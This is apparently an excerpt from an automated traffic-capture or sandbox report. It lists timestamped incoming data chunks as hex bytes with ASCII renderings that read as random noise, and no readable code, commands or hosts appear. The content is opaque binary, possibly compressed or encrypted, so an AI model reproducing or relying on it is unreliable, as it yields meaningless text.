                                                                                                                                                            2022-09-29 12:45:15 UTC17438INData Raw: 59 7c 4e 9a b6 6f 03 fb 7a a6 c7 d5 6f 85 20 4c 22 9b 25 be 22 d7 73 ef 48 4d c5 9b e6 42 48 92 b0 a2 6a 65 08 b5 de 99 14 da bf 50 41 38 4b 48 16 8d 9e fd 6b ab a5 ca 66 77 84 b3 d9 28 c8 ea 6a 16 9e d7 a9 1d 47 38 9e 32 ea 4f c1 da d4 b4 20 46 07 06 87 39 28 14 0e 07 17 f8 ca cf 43 12 57 0e 15 c4 61 e9 05 16 a3 9e 6a 0a 32 2e 38 03 05 c8 02 9b 96 ab d7 f6 f8 4a f0 a6 f5 39 6b d6 85 4b 0a 3d d0 29 47 5a 53 b8 0c 85 d4 17 f3 f1 0e 22 28 d9 c0 9e a4 b7 a3 e9 67 8e fa 07 ad 85 72 fc bc c3 2f 3f fd f2 f6 b9 2f c8 17 2d f7 29 c8 27 94 cc ca 3a fb 05 45 a3 f6 2a 2c 42 74 7f 15 54 18 8e b6 23 56 15 87 56 d9 fd 7e 24 9d 1e a1 f6 2e 08 6f 2f 3d ab 75 81 c6 35 f6 66 a7 6a a1 37 d9 b4 4e 8c 6d a4 77 6f 78 b6 c4 c5 74 e8 af e3 1f e5 b5 9a a1 dc cf fe 3d b2 35 2c 41
                                                                                                                                                            Data Ascii: Y|Nozo L"%"sHMBHjePA8KHkfw(jG82O F9(CWaj2.8J9kK=)GZS"(gr/?/-)':E*,BtT#VV~$.o/=u5fj7Nmwoxt=5,A
                                                                                                                                                            2022-09-29 12:45:15 UTC17439INData Raw: 3d 65 c5 5c 32 1c 8c 11 52 a3 56 97 af fe e2 73 99 0a da 9d 1f df 97 c1 b1 8f 7f 6d 33 46 1a 8d 59 f7 64 38 aa e3 60 3a 97 c7 2c a6 da 67 9b f4 cf b1 51 8a a9 b0 63 49 e7 e5 76 2a 42 aa 1c c5 d4 ff 5b 8e a1 9e 06 77 cf 46 e0 3c 0e 1c 6a 72 40 1c 1b 30 ad 13 bf 60 16 b4 83 17 08 48 04 df 12 7e a4 b0 3b 3f aa db fb 71 47 c7 4b 2a 7a c9 c0 cb ca 56 fc 70 8f 31 28 2e db 5c 0d ca d1 0c 14 9c 3d 0c 66 4e 71 ee 98 47 68 2f d7 d8 14 5a de 6f 0e 79 d5 6a 4d 53 14 f1 a7 a6 3e 33 79 1e f0 2d a4 ac 22 6b 0e b1 0a e5 14 84 30 3b a8 69 6a 4a e1 30 1b 4c d3 d8 c9 1e cc 2a 1c 43 5a 81 57 13 ca 66 8f fc ab c3 b7 3f 82 e3 02 2c f9 ba 2c 24 6e 2c b1 d5 8a 73 0a c5 c7 68 e2 28 99 88 20 b5 d5 36 ad 9a 30 42 dc 7b 54 19 73 e9 f5 8e fd 74 6d c0 42 ab 7d 07 ca c1 ee ac 63 c1 79
                                                                                                                                                            Data Ascii: =e\2RVsm3FYd8`:,gQcIv*B[wF<jr@0`H~;?qGK*zVp1(.\=fNqGh/ZoyjMS>3y-"k0;ijJ0L*CZWf?,,$n,sh( 60B{TstmB}cy
                                                                                                                                                            2022-09-29 12:45:15 UTC17440INData Raw: 38 7d 60 3c bc 98 e2 97 dc 35 ec 52 3d 8d 53 4d 0d 2e 40 e1 23 38 bd 66 f9 8d dc d2 ef bf 05 6a 55 a3 3f 9f 0a 2c 8f 2e 94 ce 10 b1 67 fd d4 31 3d 00 65 ba e5 78 ae cf 78 cb 25 3f b4 d4 77 a9 d6 8d a7 07 62 31 d3 ae 42 1e 79 b4 07 23 51 da 82 15 5d 04 29 6b f5 be fc 9f d3 c4 57 8c 7e c6 90 ef cc f0 26 d7 9b 88 12 4e 31 db 0f 6d a3 9a 59 a6 61 b7 78 65 2d 08 1f 38 07 17 64 1b a6 3c 35 9a fe f1 f9 a6 83 34 b6 e2 dc 70 a9 24 47 6a e7 c6 a8 ec c2 c4 61 a4 b2 72 e1 14 5b 2a 52 06 0c 44 03 9f 95 1e f5 ba 04 c7 e3 7f 6c 63 fa f6 9c e1 2b af ab 50 4b 9a ce 00 91 a4 a8 7c a9 cc 49 77 6a 04 66 28 a9 01 2c ec de 26 36 b3 ce 58 e0 a1 51 d6 a7 7f 2b ef 4b f8 46 06 f8 3c 00 4a 78 ff 92 98 bd b6 af 7f 45 65 8f 6e 96 3d b5 56 c0 84 9a 0c e1 3d 0e 19 86 79 59 c0 db 21 3d
                                                                                                                                                            Data Ascii: 8}`<5R=SM.@#8fjU?,.g1=exx%?wb1By#Q])kW~&N1mYaxe-8d<54p$Gjar[*RDlc+PK|Iwjf(,&6XQ+KF<JxEen=V=yY!=
                                                                                                                                                            2022-09-29 12:45:15 UTC17442INData Raw: 90 b7 a0 6a bc a5 01 5b be c6 99 22 33 16 56 d7 d7 3f f9 d5 c6 d1 78 2a f4 61 4e 07 66 4a 46 dc ad 54 3a fa 90 d8 4e fd 59 d4 c6 22 e3 ec 9a 07 bd 56 6d 44 d6 4b 46 f0 d6 c9 74 5a 82 35 7e c2 68 7a 4d 2a 37 06 ca e3 b9 52 dc e4 85 af 12 46 84 c9 65 46 b2 86 d8 90 ef d5 60 2a 3e 20 2b 8e 45 d4 82 a9 37 31 d5 6f 6e a2 40 e1 77 12 a2 24 51 2f 7a 9e 50 1a 3c ef 3d 37 a0 3c be f0 03 58 01 d2 66 5a 54 cd cc d9 28 ba 79 96 83 a8 b2 85 bc 85 c3 b1 62 70 77 c5 21 e3 14 3a 56 26 3e 03 b0 44 8a 9f 22 f5 71 9e 4e 3f 6a 51 8b 38 ed d5 0b da 16 33 f3 93 7b 10 1d 72 6d bd 7a 52 dd 02 72 f7 21 82 2a d8 6b 86 9c b5 a3 aa d4 d7 f8 24 4e 8a 56 a0 db ab 08 35 16 0f 5b 02 a1 34 1d 12 e9 b9 88 d0 7d 2d 23 34 cc 83 0e e9 65 af 9f 9f 26 e4 1a 30 e6 5f 98 23 5b 97 45 59 87 1a 08
                                                                                                                                                            Data Ascii: j["3V?x*aNfJFT:NY"VmDKFtZ5~hzM*7RFeF`*> +E71on@w$Q/zP<=7<XfZT(ybpw!:V&>D"qN?jQ83{rmzRr!*k$NV5[4}-#4e&0_#[EY
                                                                                                                                                            2022-09-29 12:45:15 UTC17443INData Raw: 31 55 06 4c 89 10 6a 91 2d a5 57 18 80 12 20 7b a2 8a 49 d5 dc 02 c4 a5 86 d2 ab 8a 98 fa 96 57 b6 e1 51 36 dc 4e 06 64 56 03 dd 22 40 70 f7 26 af c5 6e 50 c9 a3 72 31 0b 80 e6 92 a5 a4 b6 97 9d 62 93 ce 28 0c b0 b7 3d 01 73 30 d8 da f4 0e 08 87 87 4d 86 e2 97 58 a0 6a a3 e8 6b 53 31 c5 b0 a6 8b 96 bd c2 a7 d7 1a c9 cb e5 c4 50 20 ff 6c 30 5f c3 77 c9 f1 99 ca ec 82 a3 81 0e b3 51 2e d2 f4 1c 94 46 a3 d2 f0 54 ea 80 92 bf 59 a5 5c e8 da 17 91 1f ca cc 48 61 9f cb 79 e2 f4 d6 88 39 77 77 70 b8 08 8b 15 8d 9e f1 7d 97 eb 1b d2 bb 7f ed 4d 6b 36 27 ed 7b 1d 70 2c 1e 64 78 59 77 d6 21 88 2f 47 71 86 15 d7 91 95 03 31 95 8b d1 d6 23 79 aa 86 1c 99 51 ad 23 c6 c9 46 20 d3 3b 36 7e d3 94 54 04 dc eb 8c 02 ec 60 68 81 07 75 91 b3 6e a7 23 57 b7 cb 95 a5 79 52 b5
                                                                                                                                                            Data Ascii: 1ULj-W {IWQ6NdV"@p&nPr1b(=s0MXjkS1P l0_wQ.FTY\Hay9wwp}Mk6'{p,dxYw!/Gq1#yQ#F ;6~T`hun#WyR
                                                                                                                                                            2022-09-29 12:45:15 UTC17444INData Raw: fb 8c 6b 9d 0f 7b b5 4f 47 19 44 78 6a dd 6f 3c e5 7c 87 8d e6 1a bf 89 cd 2f 30 f8 71 aa 0b e9 95 b7 23 d0 98 82 c7 d1 4c c7 10 4d 1f d2 bd de 5b e8 e2 9e a8 a9 44 0c ef 65 0a 1c 77 2d 2a a1 e0 dc e5 02 06 89 02 79 79 11 90 f2 dd 76 20 c5 ea 1a 26 78 68 41 97 15 12 ac 6d 94 14 1e 91 8b f4 c9 ab a4 45 ee 77 df 23 ec 55 05 54 0e 8c b8 ff b6 68 5a 96 27 94 70 ee 8d 3a fc 56 58 cb 54 34 91 a9 fc d3 8e 1d f4 0e fd e8 cb 57 83 cb 91 4b 53 e0 59 7b e9 24 6c 88 50 8b 0f d0 5e dd f2 3e 9d b5 46 f5 8a ba c8 bf 60 38 46 c3 f2 30 07 d5 dd 63 0f 52 6e a7 a4 f4 98 6e c3 19 48 8a cb c9 50 d1 a7 2f 67 11 86 d5 e8 35 27 cf d4 f8 62 aa c2 2b a3 fe 06 8a ab ca 20 35 71 ca b5 f7 84 ca 2b 87 a3 1a 16 6c e5 4a 68 45 eb f8 35 9d 81 16 2f 75 48 af 38 67 1c fc 1e 6c cb d9 80 50
                                                                                                                                                            Data Ascii: k{OGDxjo<|/0q#LM[Dew-*yyv &xhAmEw#UThZ'p:VXT4WKSY{$lP^>F`8F0cRnnHP/g5'b+ 5q+lJhE5/uH8glP
                                                                                                                                                            2022-09-29 12:45:15 UTC17446INData Raw: a8 21 fe 98 98 f8 b4 c7 8a 5d 0d b3 01 8a ab cd c5 06 f9 5f 23 98 97 07 db e7 e4 b1 fb 4d e3 35 7f f5 59 7d d0 2b 3f 2d db 11 ab a6 79 00 db 4e 74 e2 3e 89 45 92 38 66 4a 9b 6d 60 df a9 a3 07 0b b1 7f c0 fc 52 c3 8d 2a 2f ce 1e 14 21 68 00 f5 b7 5b 54 39 3d d3 d1 20 ef 12 55 76 93 39 6a 03 fa 1e 80 9b 13 49 a9 0c 93 1b c0 e0 80 67 42 54 a1 fb f6 af 4f 75 e0 df 4d 56 67 72 64 d8 c9 25 1f 45 58 28 b3 5a 50 53 8f de c9 27 bd 8d 97 80 9c 3b 07 24 7d 31 34 b6 ea 15 dc 6d c5 23 d1 91 6f 78 30 2b e2 d3 49 85 88 fe f5 2a 83 d7 52 52 a7 1e 16 7d 3d f6 a8 04 93 c3 38 a2 b7 96 fe 96 6f 06 5c 2c 42 a3 a2 bc 9c 3d 46 55 96 af 9d a0 ab 6b d5 06 f5 03 d3 d2 59 83 d0 7d b6 d7 2b 4c f5 2c 0f 0f d1 35 43 c3 4b 4f 2a 05 97 95 84 f8 30 48 cc c1 4e c5 63 8a 3a 65 a6 e0 a4 c1
                                                                                                                                                            Data Ascii: !]_#M5Y}+?-yNt>E8fJm`R*/!h[T9= Uv9jIgBTOuMVgrd%EX(ZPS';$}14m#ox0+I*RR}=8o\,B=FUkY}+L,5CKO*0HNc:e
                                                                                                                                                            2022-09-29 12:45:15 UTC17447INData Raw: e5 78 7d a2 ed af de a4 57 fe 25 ad 17 38 0a 5b cd 1d b0 a9 ab d6 69 41 12 ee 1b e3 88 2f d4 69 b7 eb 99 eb b7 33 92 f1 fe b4 d5 85 24 68 d5 b1 da 4a aa 0c 86 cf 76 08 99 95 73 cc fb af d2 7b 84 5f 02 59 fe a4 ff 7d d9 a8 39 95 5d b6 03 24 fb b0 7e c5 b6 c5 8e 56 ac 47 0e a8 ac 82 ac 38 d9 78 38 67 3b 83 19 ec 76 2e 68 ad 3a 7e 3b a5 1b d1 c1 0d 5d 6c 20 3e bd ba 7a 70 e8 06 e9 5e e2 8a 43 69 5a df 5f 90 19 eb e7 17 5f 91 10 53 2b 25 7c d5 99 9b f8 14 e3 b2 11 90 e1 7f 02 49 25 e1 fb d8 e6 8e c4 64 20 8b 34 5c be 1a b4 be f9 6c 2c 5e 40 cf b1 db 50 da 83 b1 25 c2 6e 8c cc 73 35 fc 17 ad 32 c6 b2 22 64 7c 65 1d 92 cf 79 13 1f ab 1f 3b b3 19 9e cd 5f c6 ed 13 dd 9a 71 3b af 43 70 4a 1e 45 81 1a 9d 04 05 1a 84 9c d2 8d a6 48 27 49 99 ce 32 73 f2 e4 5a 58 79
                                                                                                                                                            Data Ascii: x}W%8[iA/i3$hJvs{_Y}9]$~VG8x8g;v.h:~;]l >zp^CiZ__S+%|I%d 4\l,^@P%ns52"d|ey;_q;CpJEH'I2sZXy
                                                                                                                                                            2022-09-29 12:45:15 UTC17448INData Raw: aa 53 47 f2 70 1b ee a9 4e da 4b 38 e2 7e 21 cd fa 50 b7 f6 dc 9c bd 2b ec c7 9c e4 4f da b0 90 36 f2 7a 55 be 25 3c 14 66 e7 79 0c 22 fc ab 29 91 e2 b7 1a 00 75 8b 8d e8 ee 24 2a e0 26 a2 75 6b 6c f7 c4 fb 39 ae a1 8a 8b ff 07 26 0d b6 c6 b5 f6 94 81 c9 0c 47 d8 52 b4 b6 1f 98 ff e6 b2 64 c3 9f 19 f9 ef 19 7f de 13 d0 be e0 3a 92 df e7 95 cb fc 68 d8 7b 61 c7 ca 52 ac b9 55 e5 05 b0 a7 33 b2 79 1c 82 53 99 8a c3 f7 fb 14 02 1d 91 6e c9 84 8c ff 4a 04 14 1a c8 8e 88 20 c5 6f d5 f5 0b 57 74 80 87 21 26 28 04 3a a5 d7 18 f6 ec e3 d5 79 f3 0f 3a ec 37 3d c2 4d 99 cb 47 22 cf c7 5b a5 a0 7d b8 4f fe 40 ca 53 a8 97 54 83 b8 b4 82 b4 ac f4 f6 39 55 e7 59 a6 66 24 12 27 5e 3d 82 8e 93 1f 69 53 ba ab 82 ba ee cb 94 78 71 62 c4 82 a7 7e 33 db 21 71 e1 f3 98 27 4c
                                                                                                                                                            Data Ascii: SGpNK8~!P+O6zU%<fy")u$*&ukl9&GRd:h{aRU3ySnJ oWt!&(:y:7=MG"[}O@ST9UYf$'^=iSxqb~3!q'L
                                                                                                                                                            2022-09-29 12:45:15 UTC17450INData Raw: 05 b0 51 3c 0f c7 db 13 4a c1 80 09 03 b1 36 41 49 52 12 a1 28 df e5 97 44 7e 81 35 d3 bb 06 93 3d d5 1d cd a7 6e 9e e4 02 00 d8 5b 6e 0a 79 0b 25 c9 f6 25 84 1f 7e a3 99 2a 7f 3b c9 78 07 c7 74 7f 3f dc b3 13 f7 f0 a4 aa d3 4c 97 f2 a3 75 b8 4a 32 17 ec 58 0e 93 9f d6 db 40 00 a3 d8 67 66 de 3f 38 12 65 ad cc 9d d2 04 2f 4b 27 8e 7e 1a d6 1e 55 20 e5 f3 bf 8b b3 e5 4b 00 75 d8 53 25 f5 b6 92 c5 22 c9 39 f2 15 1d dd 4d 03 0c 11 4e 56 87 4e ba 01 b6 82 85 8e 54 59 1d a7 e9 92 29 81 1d c6 52 65 fb 1f 6a 47 41 28 3f 5e d3 93 02 87 fe b2 59 f8 24 22 38 d9 8d 1f 28 21 4b ee 89 36 c2 1b 20 00 a6 b9 0c b3 67 b9 23 71 67 96 85 fc 0e 63 fe 0b 89 70 0e be 55 14 97 8e 5a d4 da 8a 9a 9b 7f af dd 31 d2 4e 7d f4 d4 58 42 33 9e 75 b6 6e 52 ee de 3d a5 d8 02 05 30 1c c8
                                                                                                                                                            Data Ascii: Q<J6AIR(D~5=n[ny%%~*;xt?LuJ2X@gf?8e/K'~U KuS%"9MNVNTY)RejGA(?^Y$"8(!K6 g#qgcpUZ1N}XB3unR=0
                                                                                                                                                            2022-09-29 12:45:15 UTC17451INData Raw: a4 90 94 73 1a aa 1e 4f da c6 47 ad 57 b5 60 0c e8 a6 58 02 f2 b6 fe 63 13 1f f7 9a 6b 6c 19 c8 1e 9a 5f c5 31 67 ea 99 76 91 f9 2a bb 4f f5 90 fd 90 49 98 51 33 48 46 72 7a 42 a3 6a b7 e6 b2 95 f6 ef 46 cd f7 55 38 90 fa 43 33 fe 82 31 c4 86 86 a6 88 18 e7 24 8e d6 a8 4d 18 03 4d 04 8d 71 f2 3b ec 24 aa 35 9b ce c5 2f 56 ea 6c 3b 3f 82 98 67 76 c2 68 fe ae 81 d6 45 0d 72 58 cc c5 a5 73 a9 27 78 bc 91 f8 13 f9 6d dc 28 40 ec ce d4 71 9e f6 ea d9 36 16 eb 66 cc 0a 21 6b ab c5 fd 8e d4 5d c3 1f 04 b6 76 61 c9 38 39 da 95 8f 2c 83 e0 67 54 47 fc c5 6d 07 0c 5d 46 49 27 f3 91 35 8a f6 d9 85 f7 5f d4 51 6b fd 7a ff b6 6c 55 d9 3d 8c 6d 0b 25 ab 9b b7 a6 72 5d b4 e4 4b a5 fa 47 76 2f e7 f3 0e 15 8e ad 76 c1 76 a4 4a a0 5a 4f a2 db a9 fb fc 32 a6 03 62 52 e3 c2
                                                                                                                                                            Data Ascii: sOGW`Xckl_1gv*OIQ3HFrzBjFU8C31$MMq;$5/Vl;?gvhErXs'xm(@q6f!k]va89,gTGm]FI'5_QkzlU=m%r]KGv/vvJZO2bR
                                                                                                                                                            2022-09-29 12:45:15 UTC17452INData Raw: 80 a3 6f 0a 84 e0 d1 01 c8 ed c6 c5 35 e1 38 9b ec 71 b1 09 e2 b7 a8 4e ad 67 fd be d9 dd 74 36 0c b7 2e 2c bd 07 1c a9 5c ee 79 1c 28 19 e4 7e 75 07 b4 ee bd 7d 4c 02 8e 35 60 f3 12 96 f6 42 b6 64 42 c5 99 79 c6 fd 1e bf c9 06 ff fd a4 24 4e 5f a3 fd 8f f1 01 9a 28 85 52 f4 71 8c c4 2f f1 47 25 c2 5e 5d c1 f5 02 9e 04 6d 74 0f 48 99 e6 f6 73 c4 ab 39 f0 48 8c 09 82 5b 36 9f ee da 2a 3c 41 c9 cf 27 12 60 08 c2 aa 49 8b 56 c5 a4 82 30 57 7d 4f ec d6 ab d9 d3 61 ca db 7f 8a d0 c9 5d 8b 4c 75 68 48 ae b1 6e 6a 86 64 6f 40 2b 7f 36 cb 81 b8 2c 5f 73 d9 35 f1 1c 83 16 22 09 05 6e 79 bc 51 e3 60 6d d1 26 ec 46 4c 8c 04 f8 ba 20 41 f6 e6 bd 36 13 74 b1 3e ec 72 2d 83 e8 9c 5c b9 65 9e 05 38 e9 90 dc c2 20 81 3c 74 75 87 d2 27 ba 70 9e 48 19 f4 cf 3e 70 f4 ef 01
                                                                                                                                                            Data Ascii: o58qNgt6.,\y(~u}L5`BdBy$N_(Rq/G%^]mtHs9H[6*<A'`IV0W}Oa]LuhHnjdo@+6,_s5"nyQ`m&FL A6t>r-\e8 <tu'pH>p
                                                                                                                                                            2022-09-29 12:45:15 UTC17454INData Raw: 91 34 b7 ab 30 e3 f9 7c 8c 6d 2b c8 a7 90 f6 44 db 60 39 e1 67 bf 52 81 cd f7 5a 69 3e 45 e8 ce 49 56 71 82 cd 50 35 74 ae d7 e7 14 23 b3 5d 40 25 6a 0f f1 65 b4 c4 4d e7 35 37 ca b6 33 81 9e be e5 48 3c 2c f2 54 21 8e 45 25 9e 25 65 d7 37 66 cf a0 cc e2 65 d8 ff d0 c4 6c 33 07 fd 74 61 96 12 67 55 80 a1 1c 3c 80 29 b4 95 95 23 16 53 a6 77 6e 22 21 38 af 50 a9 49 9f 6e 25 9e d2 7a 9b bf 2f 86 c1 ed 0f 03 f0 3e 1c 20 f3 18 fa d3 19 7a e3 5c 22 68 46 84 5b 1c 1a 45 29 fe cb cf 89 85 32 93 62 7d 24 17 d7 75 bf 65 36 eb d6 eb 1d 49 84 79 35 9c c7 ea 3a 50 52 24 b0 99 d5 2c cc fe dd 38 fe b9 bf 2c bf 4e 0a ec 51 97 85 b0 64 54 0f 96 07 1b e0 70 db 20 41 40 4c 67 f3 98 62 1b c0 d3 6b c1 22 39 4e b5 90 77 e8 0e 2d 7b b6 6d 95 eb 27 b0 02 81 c4 04 a8 0c 4b 6b 32
                                                                                                                                                            Data Ascii: 40|m+D`9gRZi>EIVqP5t#]@%jeM573H<,T!E%%e7fel3tagU<)#Swn"!8PIn%z/> z\"hF[E)2b}$ue6Iy5:PR$,8,NQdTp A@Lgbk"9Nw-{m'Kk2
                                                                                                                                                            2022-09-29 12:45:15 UTC17455INData Raw: 8f e3 ca b9 7a 3a f0 50 d9 14 99 22 ba 77 48 67 91 a6 72 f1 85 ca de 07 47 84 23 3b 99 33 0c 3f 70 ad 85 ea ce b7 cc 94 13 32 60 21 56 60 c0 ac 96 46 51 2a 4f 79 cf 3e ab 78 d5 e0 e5 ef 01 19 2c dc a4 90 2f 78 0d 4f 81 85 21 3c dc e4 eb 8e 0e e8 90 ed 8c 6b 4f 6e 1c 35 32 59 92 55 50 fb 92 c2 5c 42 e2 91 19 ba 87 f8 9d 86 20 82 48 9f 8e 18 20 08 fa 2b e3 33 ed b3 39 14 33 4d 26 cd 75 e9 69 de 1f cf ec 05 15 e4 ea 8a 9f c0 10 8e d4 22 e2 e7 08 0a ee a3 09 43 4e 03 32 9f 46 8d 83 8e 6e 7c 0c f4 db 78 46 86 d6 ed d2 04 96 d5 d0 a2 77 85 5f 1d fe eb 85 7f 41 39 85 f6 e8 18 af bb 67 29 29 91 65 3d a9 90 3d 26 cf 73 54 59 53 cb c2 6a 49 f1 53 96 60 a4 4e 33 dd 29 fc 8f fb 95 fb 86 c6 6c e1 07 7d 6f 25 36 04 79 06 d2 67 ff d8 f7 0e 85 68 0e 52 8e 60 d1 ff 6b 24
                                                                                                                                                            Data Ascii: z:P"wHgrG#;3?p2`!V`FQ*Oy>x,/xO!<kOn52YUP\B H +393M&ui"CN2Fn|xFw_A9g))e==&sTYSjIS`N3)l}o%6yghR`k$
                                                                                                                                                            2022-09-29 12:45:15 UTC17457INData Raw: 58 92 aa 0b 7d 70 5b fa eb 80 ef 16 eb e6 0b f4 57 ad cf ae af c8 0b a6 51 8d d3 9f 79 b2 6b 56 a1 a5 c3 c7 7c c0 11 61 67 a0 89 2c 7d 55 df 68 c4 ba a6 87 b0 77 6f a9 a1 90 f3 e0 e5 b4 b1 e9 59 cc 4e 02 82 7c c5 01 ee 1a 70 45 59 38 b2 52 01 e5 5e df d5 5e a9 43 11 91 e9 5e 4c 81 96 2a f1 6c a2 35 4e e1 7b 9b 49 d2 a4 c0 e5 06 a9 88 72 6c 70 52 c1 32 c8 30 32 aa 7a 5a 38 b2 ae b4 d9 4e 57 24 9b 13 9a f6 b6 ff f5 a4 a9 ad 58 17 bb d2 ba 0d 35 20 e3 f6 f3 c9 0d 2d a8 33 8c 5a 97 4c 5d 60 18 2c 75 16 f0 e4 31 de 0b 7a c7 7a ae 33 d0 67 3b 50 78 09 46 d4 26 0f 13 74 ff 0b 61 a5 27 ff 21 18 be d0 7e 65 77 2b ed 2c fe 95 d7 fa 09 90 ee df 34 42 0e 8d 60 8a bf 42 f9 9d dd e9 f2 4e 82 5e 03 e8 71 2a 34 6f b2 82 b3 85 ec 09 db 72 76 c7 6b bf 37 46 62 7c ae 4b 35
                                                                                                                                                            Data Ascii: X}p[WQykV|ag,}UhwoYN|pEY8R^^C^L*l5N{IrlpR202zZ8NW$X5 -3ZL]`,u1zz3g;PxF&ta'!~ew+,4B`BN^q*4orvk7Fb|K5
                                                                                                                                                            2022-09-29 12:45:15 UTC17458INData Raw: 87 fc 4a 82 ac 05 3f 91 1f 3f 46 d7 a9 aa 18 93 dd 54 4e 63 01 27 88 35 97 05 16 c5 e5 90 ad d7 cd ba 8f f2 0d 65 3b af 8a 41 4b ff 35 62 07 13 03 1c 98 cf 40 d7 cb 89 80 a4 5c 3a 55 4e 77 5b e9 fc 6b d3 dc 0e b0 13 7f d6 e7 1c f5 c5 75 6d 33 66 06 ca 84 87 2b 68 73 86 c0 4b 5e 7c 43 51 f9 04 ea 62 e4 a8 6e da 72 40 76 ce 2c 83 f4 a1 21 55 5c 87 c0 40 38 cc bf a3 fb b7 18 48 e0 a1 56 05 fb 01 ce aa da 51 61 72 98 ed dd fe bc e6 78 a7 65 6b 3f 5d 86 6c 64 d8 fc 11 9a 60 b8 d8 14 1d 83 f8 e1 37 1f c3 2f 8e 24 96 f2 3a 78 7d 11 d1 53 96 2d 68 43 0c ed 82 fe 84 a9 01 15 57 88 f9 1e fb 7f f5 70 5b 63 1e b1 53 d2 95 a7 ec ef 8d ad 84 b2 7d b0 94 27 40 79 81 8f 0e d4 52 7b 7f 2e 96 65 92 a6 df 8c 30 f5 42 a3 83 34 15 2e 18 42 a7 0a d5 96 88 4c 62 cf db 61 f2 0e
                                                                                                                                                            Data Ascii: J??FTNc'5e;AK5b@\:UNw[kum3f+hsK^|CQbnr@v,!U\@8HVQarxek?]ld`7/$:x}S-hCWp[cS}'@yR{.e0B4.BLba
                                                                                                                                                            2022-09-29 12:45:15 UTC17458INData Raw: 9d 46 2b 83 ae f3 5e 10 40 80 7d 34 ba fb ad 55 d4 05 fa b4 02 96 e7 4c 9e 06 59 4b f2 a3 7e a5 58 d4 f6 e4 92 58 24 98 fc e1 94 c5 4e 7b 0a f7 9a 6f fa 6b e3 99 71 21 f4 ab 46 ef 22 b9 cb 39 03 75 9f b2 1e c4 d8 98 c8 b2 62 3f 27 d4 6e 08 c3 d5 2b fe 3c 2f e6 32 bb d1 31 c6 02 c8 b3 b1 ff 3d 43 0f 5d 53 25 b4 d0 52 41 38 2e d4 9d a8 b7 54 73 c5 cf f6 f7 ac c1 59 3f c5 4e 65 f9 fb 87 97 c9 04 8a b6 5d ec b1 aa 89 5a 24 81 3e 81 9c c7 8e 89 fd 3f 37 22 91 9e 7f fa 5b 35 30 d5 05 df b1 d8 f6 b6 69 dd fe 1d 92 9c 2e 1d 9d 94 a9 f3 5e 77 4d 93 2e 04 e4 2f 75 26 1c 4d a5 83 f0 f8 e4 bc f0 f9 1a 16 bb 71 b7 92 09 47 cd f8 36 4a 85 8e 43 50 0d eb 80 d3 2c 7b 58 4c 0e a6 68 f6 fc 11 b3 d3 ef 5e 80 42 c7 e2 bc 72 48 12 2c 96 8f 46 01 33 81 49 4d e5 85 c1 69 66 9f
                                                                                                                                                            Data Ascii: F+^@}4ULYK~XX$N{okq!F"9ub?'n+</21=C]S%RA8.TsY?Ne]Z$>?7"[50i.^wM./u&MqG6JCP,{XLh^BrH,F3IMif
                                                                                                                                                            2022-09-29 12:45:15 UTC17474INData Raw: 28 ff 89 13 0d e8 5e 2d 63 9a 95 c3 52 34 8a 09 b4 cd 6f db de af 83 dd 37 70 2f b7 1a ef ca 3d b6 10 04 f4 75 c3 04 02 2e 0d 6b d2 76 00 d0 38 86 8b 41 6e 9c b0 db 40 b0 0a b0 2d d0 77 b5 eb c3 d3 0b 06 79 87 bb d5 18 68 b4 08 93 1b a9 8c c7 4d 47 83 19 df 00 44 ef 84 09 12 4f d2 9d 83 70 06 c8 cc 7d 25 e3 a7 c8 b4 cc aa 96 a9 1c 8f 5a 03 d9 35 c7 ad 39 0f 78 86 4b d1 12 d4 db 92 35 6d a2 9c c0 d3 4f 15 f2 10 fb a7 00 df 82 e2 08 55 08 75 89 7e 04 96 83 b7 f7 15 30 93 ee 4d c9 b9 4b 68 73 44 3c bd b8 fd ea e0 ec 11 34 65 90 63 2c f7 93 c5 56 ad 30 25 9a 6c a4 65 5d 1c 3f d1 5a 4c 9b 6f 64 e5 de 96 bb b9 d5 9f a3 82 e6 15 fc 89 b8 02 1a 9b e2 5d 54 b6 ae bc 37 4d 39 e0 10 b6 ca 72 17 0f 68 9b e1 75 ca e3 d4 90 21 6d 79 8c 8e f9 8b 32 16 0d 15 f1 1c d5 47
                                                                                                                                                            Data Ascii: (^-cR4o7p/=u.kv8An@-wyhMGDOp}%Z59xK5mOUu~0MKhsD<4ec,V0%le]?ZLod]T7M9rhu!my2G
                                                                                                                                                            2022-09-29 12:45:15 UTC17490INData Raw: f8 d4 e8 28 5c ee 4b 80 75 18 14 8d d2 37 10 51 9b 50 7a c1 25 49 7c ae e1 a8 76 01 90 d7 a8 0b 17 94 4f d3 61 fb d2 9c 92 12 a3 19 c1 69 c7 ce b8 94 9a a5 8d 93 f8 d5 e6 06 03 d0 16 4f 90 25 71 af a6 a5 1c 23 20 1b 8a b7 49 73 ef 50 e9 0b 5c a5 0d 52 20 bd 57 52 fa 4c f3 49 4b 37 02 88 47 34 95 92 42 42 4b 7f 5d e9 a1 5c e8 96 2e 3d 71 05 3e 4c e9 a6 86 1f ea 03 1b ee 71 30 35 52 c0 a5 28 e5 b8 69 31 d3 38 f6 ba 84 13 41 e8 09 12 2d 25 19 d3 38 66 f4 27 a8 38 65 98 e9 8f ed 6b 77 33 66 16 71 f6 1f 0d b7 93 3d 87 b6 05 68 87 ab 6e 99 b2 a2 6e 9b ec 4e 3d d2 53 6b ea 11 46 e0 01 a7 01 b0 b8 c1 20 8d f6 94 97 94 f2 7c fc 90 61 18 19 53 65 f0 cb 14 44 20 dc 5d 31 0b b7 16 94 f4 2a 7c 7c 05 76 8b b0 e3 9a 25 f7 81 10 6e 73 51 e1 dd 01 e7 5c be 6c ad 8d f5 01
                                                                                                                                                            Data Ascii: (\Ku7QPz%I|vOaiO%q# IsP\R WRLIK7G4BBK]\.=q>Lq05R(i18A-%8f'8ekw3fq=hnnN=SkF |aSeD ]1*||v%nsQ\l
